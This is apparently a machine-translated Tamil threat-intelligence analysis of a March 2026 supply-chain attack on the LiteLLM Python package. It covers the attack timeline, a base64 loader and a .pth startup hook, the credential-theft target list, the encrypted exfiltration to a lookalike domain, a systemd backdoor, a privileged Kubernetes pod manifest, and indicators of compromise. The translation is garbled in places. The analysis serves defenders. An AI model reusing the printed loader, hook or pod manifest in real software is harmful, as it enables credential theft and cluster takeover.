லைட்எல்எல்எம் விநியோகச் சங்கிலித் தாக்குதல்

LiteLLM விநியோகச் சங்கிலித் தாக்குதல்: TeamPCP எவ்வாறு AI உள்கட்டமைப்பில் பின்கதவு புகுந்தது

பொருளடக்கம்

கட்டாயம் படிக்க வேண்டிய பதிவுகள்

சமீபத்திய சுவாரஸ்யமான பதிவு

ஏன் திஸ் மேட்டர்ஸ்

மார்ச் 24, 2026 அன்று, பிரபலமான பைதான் தொகுப்பு லிடெல்ம்ஆயிரக்கணக்கானோரால் பயன்படுத்தப்படும் ஒரு உலகளாவிய LLM ப்ராக்ஸி கேட்வே enterpriseOpenAI, Anthropic, Google மற்றும் AWS Bedrock போன்ற AI வழங்குநர்களுக்கும் செயலிகளுக்கும் இடையில் போக்குவரத்தை வழிநடத்துவதற்கான ஒரு மென்பொருள், PyPI-இல் யாருக்கும் தெரியாமல் ஊடுருவப்பட்டது. விஷம் கலந்த இரண்டு பதிப்புகள் (1.82.7 மற்றும் 1.82.8) ஒன்றுக்கொன்று 13 நிமிட இடைவெளியில் வெளியிடப்பட்டன. அவை, பயனர் சான்றுகளைத் திருடி, கிளவுட் இரகசியங்களை வெளியேற்றி, Kubernetes கிளஸ்டர்கள் முழுவதும் பரவி, தொலைநிலை குறியீடு செயல்படுத்தும் திறன்களுடன் ஒரு நீடித்த பின்கதவையும் நிறுவிய பல-கட்ட பேலோடைக் கொண்டிருந்தன.

தோராயமாக தினசரி 3.6 மில்லியன் பதிவிறக்கங்கள் கிளவுட்-நேட்டிவ் AI உள்கட்டமைப்பு முழுவதும் ஆழமாகப் பயன்படுத்தப்படுவதால், நவீன தாக்குதல் நடத்துபவர்கள் விரும்பும் அனைத்தின் மையத்திலும் லிடெல்ம் அமைந்துள்ளது: ஒவ்வொரு முக்கிய AI வழங்குநருக்கான API விசைகள், கிளவுட் IAM நற்சான்றுகள், குபெர்னெட்டஸ் இரகசியங்கள் மற்றும் SSH விசைகள்.

ஆனால், அந்தச் சிறு சமரசம் ஒரு தனிப்பட்ட நிகழ்வல்ல. அது ஒரு தொடர் நிகழ்வின் உச்சக்கட்டமாக இருந்தது. ஐந்து நாள், ஐந்து சூழல் மண்டல பிரச்சாரம் அச்சுறுத்தல் செய்பவர் என அறியப்படுபவர் டீம்பிசிபிமுதலில் பாதுகாப்பு ஸ்கேனர்களுக்கு (Aqua Trivy, Checkmarx KICS) நஞ்சூட்டி, பின்னர் திருடப்பட்டவற்றைப் பயன்படுத்திய ஒரு பிரச்சாரம். CI/CD அங்கீகாரத் தகவல்களை npm, OpenVSX, இறுதியாக PyPI ஆகியவற்றிற்குப் பரப்பினர். நிறுவனங்கள் தங்கள் விநியோகச் சங்கிலிகளைப் பாதுகாக்க நம்பியிருக்கும் கருவிகளையே தாக்குதல் நடத்தியவர்கள் ஆயுதமாக்கினர்.

இந்தத் தாக்குதல், விநியோகச் சங்கிலி அச்சுறுத்தல்களின் நுட்பத்தில் ஒரு பெரும் மாற்றத்தைக் குறிக்கிறது. பல படிநிலைகளைக் கொண்ட, சூழல் மண்டலங்களைக் கடக்கும் இந்த வடிவமைப்பு, உயர் மதிப்புள்ள பொருட்களை அடைவதற்காகப் பாதுகாப்பு கருவிகளையே சமரசம் செய்கிறது. செயற்கை நுண்ணறிவு உள்கட்டமைப்பு, இது, பெருகிவரும் வணிகமயமாக்கப்பட்ட தாக்குதல் கருவிகளுக்கு ஏற்ப, ஒரு குறிப்பிட்ட அளவிலான திட்டமிடலையும் செயல்பாட்டு முதிர்ச்சியையும் பிரதிபலிக்கிறது. பேலோடுகள் நிகழ்நேரத்தில் மீண்டும் மீண்டும் உருவாக்கப்பட்டன (மூலக் குறியீட்டில் மூன்று பேலோடு வகைகள் காணப்படுகின்றன, அவற்றில் கருத்துரைக்கப்பட்ட முந்தைய பதிப்புகளும் அடங்கும்), தாக்குதலுக்கு முந்தைய நாள் C2 உள்கட்டமைப்பு பதிவு செய்யப்பட்டது, மேலும் முறையான விற்பனையாளர் உள்கட்டமைப்பைப் போலவே செயல்படுமாறு தரவுக் கசிவு டொமைன்கள் கவனமாகத் தேர்ந்தெடுக்கப்பட்டன. கார்டானோ கையொப்பமிடும் சாவிகள் மற்றும் வயர்கார்டு உள்ளமைவுகள் போன்ற குறிப்பிட்ட இலக்குகள் உட்பட 15-க்கும் மேற்பட்ட வகைகளை உள்ளடக்கிய, முறையாக விரிவான இந்த நற்சான்றிதழ் சேகரிப்பான், செயற்கை நுண்ணறிவு உதவியுடன் உருவாக்கப்பட்ட தீம்பொருள் ஒரு சக்தி பெருக்கியாகச் செயல்பட்டிருக்கலாம் என்பதைச் சுட்டிக்காட்டும் ஒரு முழுமையான செயல்பாட்டைக் காட்டுகிறது.

காலக்கெடு

தேதி (UTC) நிகழ்வு
மார்ச் 19 TeamPCP, Aqua Trivy GitHub Action குறிச்சொற்களைச் சிதைத்து, அவற்றிற்குப் பதிலாகத் தரவுகளை வெளியேற்றும் தீங்கிழைக்கும் குறியீட்டை இடுகிறது. CI/CD கீழ்நிலை களஞ்சியங்களிலிருந்து வரும் இரகசியங்கள்
மார்ச் 21 இதே போன்ற நுட்பங்களைப் பயன்படுத்தி, செக்மார்க்ஸ் கேஐசிஎஸ் மற்றும் ஏஎஸ்டி கிட்ஹப் ஆக்சன்ஸ்களுக்கும் இந்த சமரசம் நீட்டிக்கப்படுகிறது.
மார்ச் 22, 06:35 BerriAI சாதாரணமாக litellm 1.82.6 (கடைசி சுத்தமான பதிப்பு) வெளியிடுகிறது CI/CD pipeline பாதுகாப்பு ஸ்கேனிங்கிற்காக ட்ரிவியைப் பயன்படுத்தும்
மார்ச் 23 TeamPCP, models.litellm.cloud (தரவு கசிவு டொமைன்) -ஐப் பதிவு செய்கிறது. இது 66-க்கும் மேற்பட்ட npm தொகுப்புகள் மற்றும் OpenVSX நீட்டிப்புகளின் பாதுகாப்பை மீறுகிறது.
மார்ச் 24, 10:39 litellm 1.82.7 PyPI-இல் வெளியிடப்பட்டது -- பேலோட் உட்செலுத்தப்பட்டது proxy_server.py தொகுதி வரம்பில். இறக்குமதியின் போது செயல்படுத்தப்படும்.
மார்ச் 24, 10:52 litellm 1.82.8, 13 நிமிடங்கள் கழித்து வெளியிடப்பட்டது -- சேர்க்கிறது litellm_init.pthஇது, litellm இறக்குமதிகளின் போது மட்டுமல்லாமல், ஒவ்வொரு பைதான் மொழிபெயர்ப்பி தொடக்கத்தின் போதும் இயங்கும் ஒரு பைதான் பாதை உள்ளமைவு இணைப்பு ஆகும். இது விரைவான தரவுப் பொதி செயலாக்கத்தைக் காட்டுகிறது.
மார்ச் 24, ~16:00 சமூகப் புகார்களுக்குப் பிறகு PyPI இரண்டு பதிப்புகளையும் நீக்கிவிடுகிறது. பதிப்புகள் குறியீட்டிலிருந்து முழுமையாக நீக்கப்படுகின்றன (திடீரென அகற்றப்படுவதில்லை), இருப்பினும் CDN டார்பால்கள் தொடர்ந்து அணுகக்கூடியதாகவே இருக்கும்.

ஒளிக்கால அளவு: சுமார் 5.5 மணி நேரம். இந்த நேரத்தில், எந்தவொரு pip install litellm, pip install --upgrade litellm, அல்லது CI/CD pipeline சமீபத்திய பதிப்பைப் பதிவிறக்கியிருந்தால், அந்த பேலோட் இயக்கப்பட்டிருக்கும்.

தீம்பொருள் எப்படி ஊடுருவியது: தொடர் பாதிப்பு

litellm தொகுப்பு நேரடியாக ஊடுருவப்படவில்லை. தாக்குதல் நடத்தியவர் அதனை ஒரு வழிமுறையின் மூலம் அடைந்தார். இரு-தாண்டல் விநியோகச் சங்கிலித் தாக்குதல்:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

லைட்எல்எல்எம்-இன் CI/CD pipeline பாதுகாப்புக் குறைபாடுகளைக் கண்டறிய வடிவமைக்கப்பட்ட கருவியான டிரிவியை ஒரு பாதுகாப்பு ஸ்கேனராகப் பயன்படுத்தியதால், அதுவே தாக்குதலுக்கான ஊடகமாகவும் மாறியது. ஏனெனில், pipeline பின் செய்யப்பட்ட குறிச்சொல்லுக்குப் பதிலாக மாற்றக்கூடிய குறிச்சொல் மூலம் டிரிவியைக் குறிப்பிட்டது commit SHA எனும் சமரசம் செய்யப்பட்ட செயல்பாடு தானாகவே இயங்கியது. தீங்கிழைக்கும் டிரிவி செயல்பாடு, சூழல் இரகசியங்களை கசியவிட்டது, அவற்றுள் அடங்குபவை: PYPI_PUBLISH டோக்கன், இது டீம்பிசிபி-க்கு லிட்டெல்ம் பைபிஐ திட்டத்தில் நேரடி வெளியீட்டு அணுகலை வழங்குகிறது.

இந்த “பாதுகாப்புக் கருவிகளைச் சீர்குலைக்கும்” உத்தி, டீம்பிசிபி பிரச்சாரத்தின் ஒரு முக்கிய அம்சமாகும். பாதுகாப்பு கருவிகளை (ட்ரிவி, செக்மார்க்ஸ் கேஐசிஎஸ்) முதலில் குறிவைப்பதன் மூலம், தாக்குதல் நடத்தியவர்கள் ஒரே நேரத்தில் கண்டறிதலை முடக்கி, கீழ்நிலை விநியோகச் சங்கிலிகளுக்கு சிறப்புரிமை பெற்ற அணுகலைப் பெற்றனர்.

தொழில்நுட்ப பகுப்பாய்வு: பேலோட்

ஊசி போடும் இடங்கள்

பதிப்பு 1.82.7 — தொகுதி-நிலை செயலாக்கம் litellm/proxy/proxy_server.py (வரி 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

இந்தக் குறியீடு, ஒரு அகராதி மாறிலிக்கும் அசல் குறியீட்டிற்கும் இடையில் தொகுதி எல்லைக்குள் அமைந்துள்ளது. showwarning() செயல்பாடு. இது உடனடியாகச் செயல்படும். litellm.proxy.proxy_server இறக்குமதி செய்யப்படுகிறது — இது litellm-இன் ப்ராக்ஸி செயல்பாட்டைப் பயன்படுத்தும் போதெல்லாம் நிகழ்கிறது.

பதிப்பு 1.82.8 — சேர்க்கப்பட்டது litellm_init.pth (பைதான் பாதை உள்ளமைவு கோப்பு):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

பைதான் .pth கோப்புகள் site-packages/ ஒவ்வொரு மொழிபெயர்ப்பி தொடக்கத்தின்போதும் செயலாக்கப்படுகின்றன, ஆனால் தொடங்கும் வரிகள் மட்டுமே import இவை குறியீடாகச் செயல்படுத்தப்படுகின்றன. தாக்குபவர் முழு பேலோடையும் ஒரே நிரலில் சங்கிலித் தொடராக இணைப்பதன் மூலம் இதைச் சாதகமாகப் பயன்படுத்திக்கொள்கிறார். import அறிக்கை: import os, subprocess, sys; subprocess.Popen(...)இது proxy_server.py ஊடுருவலை விட மிகவும் தீவிரமானது — litellm ஒருபோதும் இறக்குமதி செய்யப்படாவிட்டாலும், ஒவ்வொரு பைதான் செயல்முறை தொடங்கப்படும்போதும் இது செயல்படுகிறது. pyproject.toml விநியோகத்தில் இந்தக் கோப்பைச் சேர்க்கும் வகையில் மாற்றியமைக்கப்பட்டது:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

பதிப்பு 1.82.8 இவ்வாறு கொண்டுள்ளது இரண்டு சுயாதீனமான செயல்படுத்தும் பாதைகள்: proxy_server.py ஊடுருவல் (litellm proxy இறக்குமதியின் போது செயல்படுகிறது) மற்றும் .pth கோப்பு (எந்தவொரு பைதான் தொடக்கத்திலும் செயல்படுகிறது). இந்த மிகைத்தன்மையே குறிப்பிடத்தக்கது — இது இந்த இரண்டு பாதைகளில் ஏதேனும் ஒன்றை மட்டும் கண்டறிவதிலிருந்தோ அல்லது அகற்றுவதிலிருந்தோ பாதுகாக்கிறது. 1.82.7 பதிப்பு வெளியான 13 நிமிடங்களுக்குப் பிறகு, இறக்குமதி நேரத்திலிருந்து தொடக்க நேரச் செயலாக்கத்திற்கு இது தீவிரமடைந்தது, தாக்குதல் நடத்தியவர் வரிசைப்படுத்தலின் வெற்றியை கண்காணித்து, விரைவாக மாற்றங்களைச் செய்து கொண்டிருந்தார் என்பதைக் காட்டுகிறது.

நிலை 1: விரிவான சான்று சேகரிப்பு

குறியீடு நீக்கப்பட்ட உள் ஸ்கிரிப்ட் என்பது ஒரு நுணுக்கமான சான்று வெற்றிடமாகும். அது பயன்படுத்துகிறது os.walk()glob.glob()subprocess.check_output()மேலும், முழு அமைப்பையும் சல்லடை போட்டுத் தேடுவதற்கான நேரடி கோப்பு வாசிப்புகளும்:

பகுப்பு இலக்குகள்
அமைப்பு உளவு hostname, whoami, uname -a, ip addr, printenv, ip route
எஸ்எஸ்ஹெச்சில் ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; ஹோஸ்ட் விசைகள் /etc/ssh/
கிளவுட் (AWS) ~/.aws/credentials, ~/.aws/configIMDS பங்குச் சான்றுகள் வழியாக 169.254.169.254இரகசிய மேலாளர் ListSecretsஎஸ்எஸ்எம் DescribeParameters
கிளவுட் (ஜிசிபி) ~/.config/gcloud/ (மீள்சுழற்சி); $GOOGLE_APPLICATION_CREDENTIALS
கிளவுட் (அஸூர்) ~/.azure/ (மீள்சுழற்சி); சூழல் மாறிகள்
Kubernetes சேவைக் கணக்கு டோக்கன்கள்; ca.crt; பெயர்வெளி; kubectl get secrets --all-namespacesஅனைத்து இரகசியங்களும் K8s API வழியாக
சுற்றுச்சூழல் கோப்புகள் .env, .env.local, .env.production, .env.development, .env.staging — முழுவதும் மீள்சுழற்சி முறையில் (ஆழம் 6) தேடப்பட்டது /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
கூலியாள் ~/.docker/config.json, /kaniko/.docker/config.json
தொகுப்பு டோக்கன்கள் ~/.npmrc, ~/.vault-token, ~/.netrc
தரவுத்தளங்கள் ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.confMongoDB உள்ளமைவுகள்
டி.எல்.எஸ் / எஸ்.எஸ்.எல் தனிப்பட்ட சாவிகள் /etc/ssl/private/லெட்ஸ் என்க்ரிப்ட் சான்றிதழ்கள், அனைத்தும் .pem/.key/.p12/.pfx கோப்புகளை
Git தகவல் ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
கிரிப்டோ பணப்பைகள் பிட்காயின், எத்தேரியம் கீஸ்டோர், சோலானா கீபேர்கள் (வேலிடேட்டர், வோட், ஸ்டேக், ஃபாசெட்), கார்டானோ சைனிங் கீஸ், லைட்காயின், டோஜ்காயின், இச்கேஷ், டாஷ், ரிப்பிள், மொனெரோ
ஷெல் வரலாறு .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
கணினி அங்கீகாரம் /etc/passwd, /etc/shadow, அங்கீகாரப் பதிவுகள் (ஏற்கப்பட்ட SSH அமர்வுகள்)
வெப்ஹூக்/ஏபிஐ விசைகள் ஸ்லாக் வலைத்தளத்திற்கான கிரெப்hooks, டிஸ்கார்ட் வலைhooksஉள்ளமைவு கோப்புகளில் உள்ள API சாவிகள்/இரகசியங்கள்
மெ.த.பி.க்குள்ளேயே WireGuard உள்ளமைவுகள் /etc/wireguard/

இந்தத் தரவு சேகரிப்பானின் வீச்சு ஒரு கலைக்களஞ்சியம் போன்றது. இது கிளவுட் நற்சான்றிதழ்களை மட்டுமல்லாமல், கிரிப்டோகரன்சி வாலெட்டுகள், தரவுத்தள கடவுச்சொற்கள், VPN உள்ளமைவுகள் மற்றும் பலவற்றையும் குறிவைக்கிறது. CI/CD ரகசியங்கள் — இவை, தாக்குதல் நடத்தியவர் ஊடுருவப்பட்ட கணினி அமைப்புகள் மூலம் பல்வேறு வழிகளில் பணம் சம்பாதிக்க எண்ணுகிறார் என்பதை உணர்த்துகின்றன.

நிலை 2: மறைகுறியாக்கப்பட்ட வெளியேற்றம்

திருடப்பட்ட தரவுகள், ஒரு கலப்பின மறைகுறியாக்கத் திட்டத்தைப் பயன்படுத்தி மறைகுறியாக்கம் செய்யப்பட்டு வெளியேற்றப்படுகின்றன:

  • AES-256-CBC சேகரிக்கப்பட்ட அனைத்து தரவுகளையும் ஒரு சமவாய்ப்பு 32-பைட் அமர்வு திறவுகோல் மூலம் குறியாக்கம் செய்தல் (வழியாக) openssl enc)
  • ஆர்எஸ்ஏ-4096 தாக்குபவரின் உட்பொதிக்கப்பட்ட பொது விசையைப் பயன்படுத்தி அமர்வு விசையை மறைகுறியாக்கம் செய்தல் (OAEP பேடிங், வழியாக) openssl pkeyutl)
  • இரண்டு மறைக்குறியீட்டு கோப்புகளும் தொகுக்கப்பட்டுள்ளன tpcp.tar.gz ( tpcp (பிரச்சாரத்தின் முழுவதும் “TeamPCP” என்ற முன்னொட்டு தொடர்ந்து இடம்பெறுகிறது)
  • HTTPS POST க்கு https://models.litellm.cloud/ உடன் Content-Type: application/octet-stream

களம் models.litellm.cloud இது, தாக்குதலுக்கு ஒரு நாள் முன்னதாக, மார்ச் 23 அன்று பதிவு செய்யப்பட்டது. மேலும், இது முறையான லிட்டெல்ம் உள்கட்டமைப்புடன் (உண்மையான திட்டம் பயன்படுத்துவது) இயைந்துபோகும் வகையில் வடிவமைக்கப்பட்டுள்ளது. litellm.aiவெளியேறும் டிராஃபிக்கை மதிப்பாய்வு செய்யும், நெட்வொர்க்கைப் பற்றி அறிந்த ஒரு டிஃபென்டர் கூட, லிட்டெல்மின் சொந்த மாடல் எண்ட்பாயிண்ட்டாகத் தோன்றும் இடத்திற்கான டிராஃபிக்கைக் கொடியிடாமல் போகலாம்.

நிலை 3: நீடித்த பின்கதவு (sysmon.py)

அந்த பேலோட், சிஸ்டம் டெலிமெட்ரி போல வேடமிட்டு, ஒரு போலிங் பேக்டோர்-ஐ நிறுவுகிறது:

  • பாதை~/.config/sysmon/sysmon.py
  • சேவைsysmon.service (systemd பயனர் அலகு, “சிஸ்டம் டெலிமெட்ரி சேவை” என விவரிக்கப்படுகிறது)
  • நடத்தைஆரம்ப 300 வினாடி உறக்கத்திற்குப் பிறகு, வாக்கெடுப்புகள் https://checkmarx.zone/raw ஒவ்வொரு ~50 நிமிடங்களுக்கும்
  • மரணதண்டனைC2 ஆல் திருப்பி அனுப்பப்பட்ட URL ஐ இதற்குப் பதிவிறக்குகிறது: /tmp/pglog, அதை இயக்கக்கூடியதாக அமைக்கிறது (chmod 755), அதை ஒரு பிரிக்கப்பட்ட அமர்வில் இயக்குகிறது
  • நிலை கண்காணிப்பு/tmp/.pg_state ஒரே பேலோடை மீண்டும் பதிவிறக்கம் செய்வதைத் தடுக்கிறது
  • நிலைத்தன்மையேRestart=alwaysRestartSec=10 செயலிழப்புகள் மற்றும் மறுதொடக்கம் ஆகியவற்றைத் தாங்கி நிற்கிறது

களம் checkmarx.zone இது செக்மார்க்ஸ் (பாதுகாப்பு நிறுவனம்) என்பதன் எழுத்துப்பிழை ஆகும். checkmarx.comநெட்வொர்க் பதிவுகளை மதிப்பாய்வு செய்யும் SOC ஆய்வாளர்கள், முறையான பாதுகாப்பு விற்பனையாளர் போலத் தோற்றமளிக்கும் ஒரு தளத்திற்குச் செல்லும் தரவுப் போக்குவரத்தைக் காணும் வகையில் இது வடிவமைக்கப்பட்டுள்ளது. இது, பாதுகாப்பு விற்பனையாளர் அடையாளத்தின் பின்னால் ஒளிந்துகொள்ளும் TeamPCP-யின் பரந்த உத்திக்கு இசைவான, ஒரு திட்டமிட்ட தவிர்ப்பு நுட்பமாகும்.

நிலை 3b: குபர்நெட்டஸ் பக்கவாட்டு நகர்வு

பாதிக்கப்பட்ட கணினியில் குபெர்னெட்டஸ் சேவை கணக்குச் சான்றுகள் இருந்தால், அந்த தீம்பொருள் அனைத்து கிளஸ்டர் முனைகளையும் பட்டியலிட்டு அவற்றை நிலைநிறுத்துகிறது. சிறப்புரிமை பெற்ற பாட்கள் ஒவ்வொருவருக்கும்:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

ஒவ்வொரு தொகுப்பும்:

  • இயங்கும்போது சலுகை பெற்ற உடன் hostPIDhostNetworkமற்றும் முழுமையான ஹோஸ்ட் கோப்பு முறைமை அணுகல்
  • பயன்கள் chroot /host அதையே நிறுவ sysmon.py ஹோஸ்டின் ரூட் கோப்பு முறைமையில் பின்கதவு
  • இதை ஒரு systemd சேவையாகப் பதிவுசெய்து, பாட் நீக்கப்பட்ட பிறகும் அதன் நிலைத்தன்மை நீடிப்பதை உறுதிசெய்கிறது.
  • என்ற node-setup-* உள்ள kube-system முறையான கிளஸ்டர் உள்கட்டமைப்பாகத் தோன்றுவதற்கான நேம்ஸ்பேஸ்

இதன் பொருள் ஒரு ஒற்றை சமரசம் CI/CD K8s அணுகல் கொண்ட ஒரு ரன்னர், கிளஸ்டரில் உள்ள ஒவ்வொரு நோடும் பின்கதவு வழியாகத் தாக்கப்படுவதற்கு வழிவகுக்கலாம். Kubernetes-இல் litellm-ஐ ஒரு ப்ராக்ஸியாக இயக்கும் நிறுவனங்களுக்கு ஏற்படக்கூடிய ஒரு பேரழிவு தரும் பக்கவாட்டு நகர்வுச் சூழல்.

பேலோட் பரிணாமம் (கருத்துரையிடப்பட்ட வகைகள்)

மூலக் குறியீட்டின் 131-132 வரிகளில், கருத்துரை இடப்பட்ட இரண்டு முந்தைய பேலோட் வகைகள் உள்ளன, அவை தாக்குதல் நடத்தியவரின் உருவாக்கச் செயல்முறையை வெளிப்படுத்துகின்றன:

  • மூன்று வகைகளும் ஒரே தரவு கசிவு உள்கட்டமைப்பைப் பகிர்ந்து கொள்கிறது (models.litellm.cloud), RSA-4096 பொதுத் திறவுகோல், AES-256-CBC + RSA கலப்பின மறைகுறியாக்க உறை, மற்றும் tpcp.tar.gz மூட்டை பெயரிடுதல்
  • முந்தைய வகைகள் பார்த்தார் RC4 குறியாக்க அடுக்கு தரவு சேகரிப்பு ஸ்கிரிப்ட்டின் உள்ளே, வெளிப்புற AES+RSA உறைக்கு முன்பாக சேகரிக்கப்பட்ட தரவு குறியாக்கம் செய்யப்படுகிறது. இந்த உள் RC4 அடுக்கை அகற்றுவதன் மூலம், செயலில் உள்ள பேலோட் (வரி 130) எளிமையாக்கப்பட்டுள்ளது.
  • முந்தைய வகைகள் பயன்படுத்துகின்றன exec() உடன் StringIO செயலில் உள்ள பேலோட் பயன்படுத்தும் போது, ​​கலெக்டரை இன்-பிராசஸில் இயக்க கேப்சர் செய்யவும். subprocess.run() stdout வழிமாற்றத்துடன் — இது ஹோஸ்ட் செயல்முறையை மாசுபடுத்துவதைத் தவிர்க்கும் ஒரு தெளிவான பிரிப்பு முறையாகும்.
  • மூன்று வகைகளும் ஒரே சான்றளிப்புப் பிரிவுகளையும் சேகரிப்பு வழிகளையும் இலக்காகக் கொண்டுள்ளன.
  • முந்தைய பதிப்புகளில் இருந்த RC4 விசை, டெலிகிராமில் அந்த நடிகரின் கவன ஈர்ப்பு நடத்தைக்கு ஏற்ப, ஆத்திரமூட்டும் ஒரு இழிசொல்லாக இருந்தது.

செயல்பாட்டின் போது தீவிரமான வளர்ச்சி நிகழ்ந்ததை இது வெளிப்படுத்துகிறது. தாக்குதல் நடத்தியவர், தரவு சேகரிப்பு இலக்குகளையும் தரவு கசிவு உள்கட்டமைப்பையும் நிலையாக வைத்திருந்தவாறே, குறியாக்க அடுக்கை எளிமையாக்கி, செயலாக்கத் தனிமைப்படுத்தலை மேம்படுத்தியுள்ளார்.

சமரசக் குறிகாட்டிகள் (IOCs)

பிணையம்

காட்டி வகை நோக்கம்
models.litellm.cloud டொமைன் வெளியேற்ற முனைப்புள்ளி (HTTPS POST)
checkmarx.zone டொமைன் C2 வாக்கெடுப்பு முனையம் (HTTPS GET) /raw)

குறிப்பு: வெளிப்புற அறிக்கையிடல் இணைப்புகள் checkmarx.zone/static/checkmarx-util-1.0.4.tgz TeamPCP பிரச்சாரத்தின் முந்தைய KICS கட்டத்திற்கு. இங்கு பகுப்பாய்வு செய்யப்பட்ட litellm பேலோடுகளில் இந்த URL காணப்படவில்லை.

தொகுப்பு ஹாஷ்கள்

கோப்பு SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

கோப்பு முறை

காட்டி வகை நோக்கம்
~/.config/sysmon/sysmon.py கோப்பு தொடர்ச்சியான பின்கதவு ஸ்கிரிப்ட்
~/.config/systemd/user/sysmon.service கோப்பு சிஸ்டம்ட் நிலைத்தன்மை அலகு
/tmp/pglog கோப்பு இரண்டாம் கட்ட பைனரி பதிவிறக்கம் செய்யப்பட்டது
/tmp/.pg_state கோப்பு C2 நிலை கண்காணிப்பு
litellm_init.pth in site-packages/ கோப்பு பைதான் ஸ்டார்ட்அப் ஹூக் (v1.82.8 பதிப்பிற்கு மட்டும்)
tpcp.tar.gz கோப்பு மறைகுறியாக்கம் செய்யப்பட்ட வெளியேற்றக் கட்டு

Kubernetes

காட்டி வகை நோக்கம்
node-setup-* காய்களில் kube-system பாட் சிறப்புரிமை பெற்ற பக்கவாட்டு இயக்கப் பெட்டகங்கள்
sysmon.service கிளஸ்டர் முனைகளில் சேவை பாட் எஸ்கேப் வழியாக ஹோஸ்ட்-நிலை நிலைத்தன்மை

குறியாக்கவியல்

காட்டி விவரங்கள்
தாக்குதல் நடத்தியவர் RSA-4096 பொது சாவி SHA256 கைரேகை: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8மூன்று பேலோட் வகைகளிலும் உட்பொதிக்கப்பட்டுள்ளது; மற்ற TeamPCP செயல்பாடுகளிலும் அதே சாவி தெரிவிக்கப்படுகிறது.
tpcp கலைப்பொருட்களில் முன்னொட்டு தொகுப்பு பெயரிடும் மரபு (tpcp.tar.gzபிரச்சாரம் முழுவதும் சீராக

நன்றி: டீம்பிசிபி

இந்த நடவடிக்கையின் பின்னணியில் உள்ள அச்சுறுத்தல் காரணி பின்வருமாறு கண்காணிக்கப்படுகிறது: டீம்பிசிபி, PCPcat, Persy_PCP, ShellForce, மற்றும் DeadCatx3 என்றும் அழைக்கப்படுகிறது.

அறியப்பட்ட பண்புகள்:

  • டெலிகிராம் சேனல்களைப் பராமரிக்கிறது @Persy_PCP மற்றும் @teampcp அவர்கள் பாதுகாப்பு நிறுவனங்களைக் கேலி செய்த இடத்தில்
  • பல்வேறு சூழலமைப்புகளில் (GitHub Actions, PyPI, npm, OpenVSX) இயங்குகிறது.
  • பிரச்சாரத்தின் ஒவ்வொரு கட்டத்திற்கும் விற்பனையாளர் சார்ந்த டைபோஸ்க்வாட் டொமைன்களைப் பயன்படுத்துகிறது (எ.கா., checkmarx.zone செக்மார்க்ஸைப் பொறுத்தவரை, models.litellm.cloud (லிட்டெல்ம் என்பதற்கு)
  • சீரான உள்கட்டமைப்பு அடையாளங்கள்: ஒரே RSA திறவுகோல் ஜோடி, tpcp.tar.gz பெயரிடும் மரபு, tpcp-docs-* டெட்-டிராப் ஸ்டேஜிங்காகப் பயன்படுத்தப்படும் கிட்ஹப் களஞ்சியங்கள்
  • கீழ்நிலை விநியோகச் சங்கிலிகளுக்கான நுழைவாயில்களாகப் பாதுகாப்புக் கருவிகளைக் குறிவைக்கிறது

பண்புக்கூறு நம்பகத்தன்மை: அதிகம். பகிரப்பட்ட RSA பொதுத் திறவுகோல், tpcp ஐந்து நாள் பிரச்சாரத்தின் போது ஆர்டிஃபேக்ட் பெயரிடல், C2 உள்கட்டமைப்பு மேலடுக்கு மற்றும் செயல்பாட்டு வேகம் ஆகியவை Trivy, KICS, npm, OpenVSX மற்றும் litellm ஆகியவற்றின் சமரசங்களை ஒரே தரப்பினருடன் வலுவாக இணைக்கின்றன.

உள்நோக்கம்பெரும்பாலும் இது நிதி சார்ந்ததாகவும் (கிரிப்டோ வாலட் திருட்டு, கிளவுட் சான்றுகளைப் பணமாக்குதல்) மற்றும் பெயர்போனதாகவும் (டெலிகிராம் கேலி) இருக்கலாம். AWS IAM முதல் சோலானா வேலிடேட்டர் கீபேர்கள், வயர்கார்டு உள்ளமைவுகள் வரை சான்றுகளைத் திருடும் பரந்த செயல்பாடானது, ஒவ்வொரு முறை நிகழும் முறைகேட்டிலிருந்தும் முதலீட்டின் மீதான வருவாயை (ROI) அதிகரிக்க விரும்பும் ஒரு நிதி நோக்கம் கொண்ட நபர் செயல்படுவதைச் சுட்டிக்காட்டுகிறது.

